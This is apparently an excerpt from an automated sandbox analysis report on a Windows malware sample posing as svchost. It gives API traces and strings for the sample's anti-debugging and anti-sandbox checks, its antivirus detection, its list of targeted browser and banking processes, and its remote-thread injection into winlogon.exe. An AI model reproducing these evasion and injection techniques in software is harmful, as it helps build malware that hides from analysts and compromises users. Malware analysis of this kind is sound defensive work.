                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FileHttp$Request$Validate$FreeHeadersInternetmemset$AllocHandleOpen$CloseConnectCreateInfoInformationLockPointerQueryReadSendUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                                • String ID: 3eaeb407628e78f$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                • API String ID: 912145775-1534480673
                                                                                                                                                                                                                • Opcode ID: 36e2ebef47fce9c32fc0e3694e7a520841cc1e87aced6dbf4f47e7a64dbd8d69
                                                                                                                                                                                                                • Instruction ID: 55d9bc8566bb8840fec6d5b486b3e15284ddafcb25c99e0e69649d2b5997ed16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e2ebef47fce9c32fc0e3694e7a520841cc1e87aced6dbf4f47e7a64dbd8d69
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7ED18071A40255ABEB219FA5DC8DFAB7BA8EF08718F144518FA05E6380D778DD40CBB4

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 272 402b70-402ba7 call 401000 LoadLibraryA GetModuleFileNameA call 403920 277 402bb1-402bcc call 4021b0 call 4020c0 FindWindowA 272->277 278 402ba9-402bab ExitProcess 272->278 283 402be6-402c04 call 402340 call 402430 call 402520 call 402660 IsUserAnAdmin 277->283 284 402bce-402be0 GetTickCount PostMessageA 277->284 293 402c06-402c0d call 4033b0 283->293 294 402c17-402c2f IsUserAnAdmin GetModuleHandleA 283->294 284->283 293->294 302 402c0f-402c11 ExitProcess 293->302 296 402c50-402c54 294->296 297 402c31-402c41 GetProcAddress 294->297 300 402ca2-402ca4 296->300 301 402c56-402c58 296->301 297->296 299 402c43-402c4d GetCurrentProcess 297->299 299->296 303 402d59-402d72 call 401130 GlobalFindAtomA 300->303 304 402caa-402cbe StrStrIA 300->304 305 402c70-402c8e call 401130 GetCurrentProcessId call 401b70 Sleep 301->305 306 402c5a-402c6e StrStrIA 301->306 321 402db4-402db6 ExitProcess 303->321 322 402d74-402d83 GlobalAddAtomA IsUserAnAdmin 303->322 307 402cc0-402cd9 call 401130 GlobalFindAtomA 304->307 308 402cfd-402d10 call 4028b0 GlobalFindAtomA 304->308 305->321 306->305 309 402c93-402c9d call 4028b0 call 401520 306->309 307->321 326 402cdf-402cee GlobalAddAtomA IsUserAnAdmin 307->326 327 402d52-402d57 call 401520 308->327 328 402d12-402d21 GlobalAddAtomA IsUserAnAdmin 308->328 309->321 323 402d95-402d9e IsUserAnAdmin 322->323 324 402d85-402d88 322->324 333 402da0 323->333 334 402da5-402dad call 401aa0 323->334 332 402d89-402d8d 324->332 326->323 337 402cf4-402cf8 326->337 327->321 330 402d33-402d3c IsUserAnAdmin 328->330 331 402d23-402d2b 328->331 338 402d43-402d4b call 401aa0 330->338 339 402d3e 330->339 331->330 332->323 333->334 334->321 345 402daf call 401b70 334->345 337->332 338->327 346 402d4d call 401b70 338->346 339->338 345->321 346->327
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
                                                                                                                                                                                                                  • Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
                                                                                                                                                                                                                  • Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
                                                                                                                                                                                                                  • Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
                                                                                                                                                                                                                  • Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
                                                                                                                                                                                                                  • Part of subcall function 00401000: StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
                                                                                                                                                                                                                  • Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
                                                                                                                                                                                                                  • Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
                                                                                                                                                                                                                  • Part of subcall function 00401000: FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
                                                                                                                                                                                                                  • Part of subcall function 00401000: PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
                                                                                                                                                                                                                  • Part of subcall function 00403920: CharUpperA.USER32(?), ref: 00403999
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039AB
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039C4
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039DD
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 004039F6
                                                                                                                                                                                                                  • Part of subcall function 00403920: strstr.MSVCRT ref: 00403A0F
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
                                                                                                                                                                                                                  • Part of subcall function 00403920: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402BAB
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402BC2
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402BCE
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402BE0
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402C00
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402C11
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$FileFindName$ExitInformationModuleProcessProcess32UserWindow$AdminChangeCharCloseCountCreateDebuggerDirectoryExistsFirstHandleLibraryLoadMessageNextNotificationPathPostPresentSnapshotSystemTickToolhelp32UpperVolumeWindowsmemset
                                                                                                                                                                                                                • String ID: IsWow64Process$Pnv$Tue Aug 2 12:53:17 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 9317432-1956477594
                                                                                                                                                                                                                • Opcode ID: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
                                                                                                                                                                                                                • Instruction ID: 39ff8b4b23ffe36b6a173c4f6bdc5339f36d51dfac64fa60dc4ffdda49012cd9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b291367e78a862219a650f1c35e2dfbffcf1e089b291cbabdcdd32a92e30e4d6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8751A1B1600215ABEB107BF1EE0EB9E36686F84745F50013AFB01B61E1DBFC9C418A6D

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 500 403920-40396e GetModuleFileNameA strstr 501 403974-40397b call 403870 500->501 502 403ac6-403ace 500->502 501->502 505 403981-4039b2 GetUserNameA CharUpperA strstr 501->505 505->502 506 4039b8-4039cb strstr 505->506 506->502 507 4039d1-4039e4 strstr 506->507 507->502 508 4039ea-4039fd strstr 507->508 508->502 509 403a03-403a16 strstr 508->509 509->502 510 403a1c-403a5a GetSystemWindowsDirectoryA GetVolumeInformationA 509->510 510->502 511 403a5c-403a61 510->511 511->502 512 403a63-403a68 511->512 512->502 513 403a6a-403a6f 512->513 513->502 514 403a71-403a76 513->514 514->502 515 403a78-403a9e GetModuleFileNameA StrStrIA 514->515 515->502 516 403aa0-403ab0 StrStrIA 515->516 516->502 517 403ab2-403ac2 StrStrIA 516->517 517->502 518 403ac4 517->518 518->502
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403967
                                                                                                                                                                                                                  • Part of subcall function 00403870: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,y9@), ref: 0040389C
                                                                                                                                                                                                                  • Part of subcall function 00403870: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 004038C1
                                                                                                                                                                                                                  • Part of subcall function 00403870: RegCloseKey.KERNEL32(y9@), ref: 004038CF
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 0040398C
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00403999
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039AB
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039C4
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039DD
                                                                                                                                                                                                                • strstr.MSVCRT ref: 004039F6
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403A0F
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A28
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4C
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A86
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AAC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403ABE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$Name$FileModule$CharCloseDirectoryInformationOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                • String ID: Dave$MALNETVM$SANDBOX$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\$test user$test_item.exe
                                                                                                                                                                                                                • API String ID: 3012634381-649399103
                                                                                                                                                                                                                • Opcode ID: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
                                                                                                                                                                                                                • Instruction ID: 2772e22a84d8afe3dc88946ac3df406ee6e1198dc71f6cbec9561b14d5c35e9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98ae593a8036396cbb9844701f8c361d58fbeaa975e95f35afd36f7854fc9fb0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341CA71A5031866DF20DB608D85FEB7B6CAF54B05F0C05BAE644F51D0E6F89B848F94

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 519 2d37430-2d3743f 520 2d37441-2d3744c call 2d37300 519->520 523 2d37813-2d3781b Sleep 520->523 524 2d37452-2d3745a 520->524 523->520 525 2d37460-2d3749e OpenProcess 524->525 526 2d37546 524->526 527 2d374a0-2d374c0 GetProcessTimes 525->527 528 2d374fa-2d37509 EnterCriticalSection 525->528 529 2d3754a-2d37595 OpenProcess 526->529 530 2d374c2-2d374ce 527->530 531 2d374d0-2d374d4 527->531 534 2d37510-2d37517 528->534 532 2d37597-2d375b4 GetProcessTimes 529->532 533 2d375e8-2d375f9 EnterCriticalSection 529->533 535 2d374d8-2d374ea GetHandleInformation 530->535 531->535 536 2d375c2 532->536 537 2d375b6-2d375c0 532->537 538 2d37613-2d376c3 LeaveCriticalSection VirtualQuery * 2 533->538 539 2d375fb 533->539 540 2d37519-2d3751d 534->540 541 2d37538 534->541 535->528 543 2d374ec-2d374f1 535->543 542 2d375c6-2d375d8 GetHandleInformation 536->542 537->542 546 2d376c5-2d376dc call 2d448d0 538->546 544 2d37600-2d37607 539->544 540->534 545 2d3751f-2d37536 LeaveCriticalSection call 2d37270 540->545 547 2d3753a-2d3753c 541->547 542->533 549 2d375da-2d375df 542->549 543->528 550 2d374f3-2d374f4 CloseHandle 543->550 551 2d377cf-2d377db 544->551 552 2d3760d-2d37611 544->552 545->547 559 2d376e4-2d3770b EnterCriticalSection GetProcessHeap HeapAlloc 546->559 560 2d376de-2d376e2 546->560 547->525 548 2d37542 547->548 548->526 549->533 556 2d375e1-2d375e2 CloseHandle 549->556 550->528 551->529 557 2d377e1 551->557 552->538 552->544 556->533 561 2d377e5-2d377e9 557->561 562 2d37711-2d37758 OpenProcess 559->562 563 2d377c4-2d377c9 LeaveCriticalSection 559->563 560->546 560->559 561->523 564 2d377eb-2d377fe GetProcessHeap HeapValidate 561->564 567 2d3775a-2d37777 GetProcessTimes 562->567 568 2d377af-2d377be 562->568 563->551 565 2d37800-2d37809 GetProcessHeap HeapFree 564->565 566 2d3780f-2d37811 564->566 565->566 566->523 566->561 569 2d37785 567->569 570 2d37779-2d37783 567->570 568->563 571 2d37789-2d3779f GetHandleInformation 569->571 570->571 571->568 572 2d377a1-2d377a6 571->572 572->568 573 2d377a8-2d377a9 CloseHandle 572->573 573->568
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D37300: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D37314
                                                                                                                                                                                                                  • Part of subcall function 02D37300: Process32First.KERNEL32(00000000,?), ref: 02D37339
                                                                                                                                                                                                                  • Part of subcall function 02D37300: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02D3735D
                                                                                                                                                                                                                  • Part of subcall function 02D37300: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02D37377
                                                                                                                                                                                                                  • Part of subcall function 02D37300: EnterCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D3739B
                                                                                                                                                                                                                  • Part of subcall function 02D37300: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02D373A1
                                                                                                                                                                                                                  • Part of subcall function 02D37300: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D373A8
                                                                                                                                                                                                                  • Part of subcall function 02D37300: LeaveCriticalSection.KERNEL32(02D6FB80,?,00000000), ref: 02D373D7
                                                                                                                                                                                                                  • Part of subcall function 02D37300: Process32Next.KERNEL32(00000000,00000128), ref: 02D373EB
                                                                                                                                                                                                                  • Part of subcall function 02D37300: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02D37405
                                                                                                                                                                                                                  • Part of subcall function 02D37300: FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02D37416
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00001B0C), ref: 02D37494
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D374B8
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D374E2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D374F4
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB80), ref: 02D374FF
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D37524
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02D3758B
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02D375AC
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D375D0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D375E2
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB80), ref: 02D375ED
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02D6FB80), ref: 02D37618
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D37666
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D376B1
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02D6FB80,?,?), ref: 02D376F0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02D376FA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D37701
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02D37815
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateChangeCreateCurrentFindFirstNextNotificationSleepSnapshotToolhelp32
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2706041919-0
                                                                                                                                                                                                                • Opcode ID: b9e17f469b8ab3c429af16e4a184535781bc4e38308da94a80660054cba99486
                                                                                                                                                                                                                • Instruction ID: 932235bdf36cde9bdfb207520b57e88204768481fe5bec75975070fd9df042e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9e17f469b8ab3c429af16e4a184535781bc4e38308da94a80660054cba99486
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FC1F5B1A087419FE321CF65D488A6AFBE9BB88B54F54881EF59987300D770D844CFA2

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 574 401b70-401b80 575 401b86-401b8e 574->575 576 401dd8-401ddc 574->576 577 401b90-401b99 call 401fb0 575->577 580 401ba5-401bae call 401fb0 577->580 581 401b9b-401ba3 Sleep 577->581 584 401dd3-401dd7 580->584 585 401bb4-401bc9 OpenProcess 580->585 581->577 581->580 584->576 585->584 586 401bcf-401be9 GetModuleHandleA 585->586 587 401c06-401c0a 586->587 588 401beb-401bf7 GetProcAddress 586->588 590 401c0c-401c20 GetModuleHandleA 587->590 591 401c3f-401c7c VirtualAllocEx 587->591 588->587 589 401bf9-401c03 GetCurrentProcess 588->589 589->587 592 401c22-401c2c GetProcAddress 590->592 593 401c35-401c39 590->593 594 401db0-401dc4 GetHandleInformation 591->594 595 401c82-401cac WriteProcessMemory 591->595 592->593 596 401c2e-401c32 592->596 593->591 593->594 594->584 597 401dc6-401dca 594->597 598 401cae 595->598 599 401d1f-401d60 WriteProcessMemory FlushInstructionCache CreateRemoteThread 595->599 596->593 597->584 602 401dcc-401dcd CloseHandle 597->602 603 401cb1-401cc7 VirtualAlloc 598->603 600 401d62-401d76 GetHandleInformation 599->600 601 401d8e-401dad RtlCreateUserThread 599->601 604 401d85-401d8c 600->604 605 401d78-401d7c 600->605 601->594 602->584 606 401d07-401d17 603->606 607 401cc9-401d01 memcpy WriteProcessMemory VirtualFree 603->607 604->594 605->604 608 401d7e-401d7f CloseHandle 605->608 606->603 609 401d19-401d1c 606->609 607->606 608->604 609->599
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
                                                                                                                                                                                                                  • Part of subcall function 00401FB0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 00401CD8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401D01
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D7F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL ref: 00401DA0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 00401DBC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401DCD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 2373081918-3024904723
                                                                                                                                                                                                                • Opcode ID: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
                                                                                                                                                                                                                • Instruction ID: 1cc1a5b9d3a24803e7d074aebc255e1873ec8508329ddbed26f29eb15fe00603
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5e8482ce6558dcd48eb70727eb2832cdeee386e3baf9961ddfede8c17bb47e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E71A2B1640215ABE710DF94DD89FAF77B8AF84701F144029FA01B72D1D7B8A941C7A8

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 610 2d448d0-2d448e0 611 2d448e6-2d448e9 610->611 612 2d44b1e-2d44b22 610->612 611->612 613 2d448ef-2d448f2 611->613 613->612 614 2d448f8-2d44900 613->614 615 2d44902-2d4490b call 2d452d0 614->615 618 2d44917-2d44920 call 2d452d0 615->618 619 2d4490d-2d44915 Sleep 615->619 622 2d44926-2d4493b OpenProcess 618->622 623 2d44b19-2d44b1d 618->623 619->615 619->618 622->623 624 2d44941-2d4495b GetModuleHandleA 622->624 623->612 625 2d4495d-2d44969 GetProcAddress 624->625 626 2d44978-2d4497c 624->626 625->626 629 2d4496b-2d44975 GetCurrentProcess 625->629 627 2d449b1-2d449e1 VirtualAllocEx 626->627 628 2d4497e-2d44992 GetModuleHandleA 626->628 632 2d44af6-2d44b0a GetHandleInformation 627->632 633 2d449e7-2d44a10 WriteProcessMemory 627->633 630 2d44994-2d4499e GetProcAddress 628->630 631 2d449a7-2d449ab 628->631 629->626 630->631 634 2d449a0-2d449a4 630->634 631->627 631->632 632->623 635 2d44b0c-2d44b10 632->635 636 2d44a80-2d44aa6 FlushInstructionCache CreateRemoteThread 633->636 637 2d44a12 633->637 634->631 635->623 638 2d44b12-2d44b13 CloseHandle 635->638 640 2d44ad4-2d44af3 RtlCreateUserThread 636->640 641 2d44aa8-2d44abc GetHandleInformation 636->641 639 2d44a15-2d44a2b VirtualAlloc 637->639 638->623 642 2d44a2d-2d44a62 memcpy WriteProcessMemory VirtualFree 639->642 643 2d44a68-2d44a78 639->643 640->632 644 2d44abe-2d44ac2 641->644 645 2d44acb-2d44ad2 641->645 642->643 643->639 646 2d44a7a-2d44a7d 643->646 644->645 647 2d44ac4-2d44ac5 CloseHandle 644->647 645->632 646->636 647->645
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: memset.MSVCRT ref: 02D452F6
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45307
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: GetLastError.KERNEL32 ref: 02D45310
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: SwitchToThread.KERNEL32 ref: 02D4531F
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D45328
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D45348
                                                                                                                                                                                                                  • Part of subcall function 02D452D0: CloseHandle.KERNEL32(00000000), ref: 02D45359
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02D4490F
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02D4492E
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D4494D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D44963
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02D4496F
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D4498A
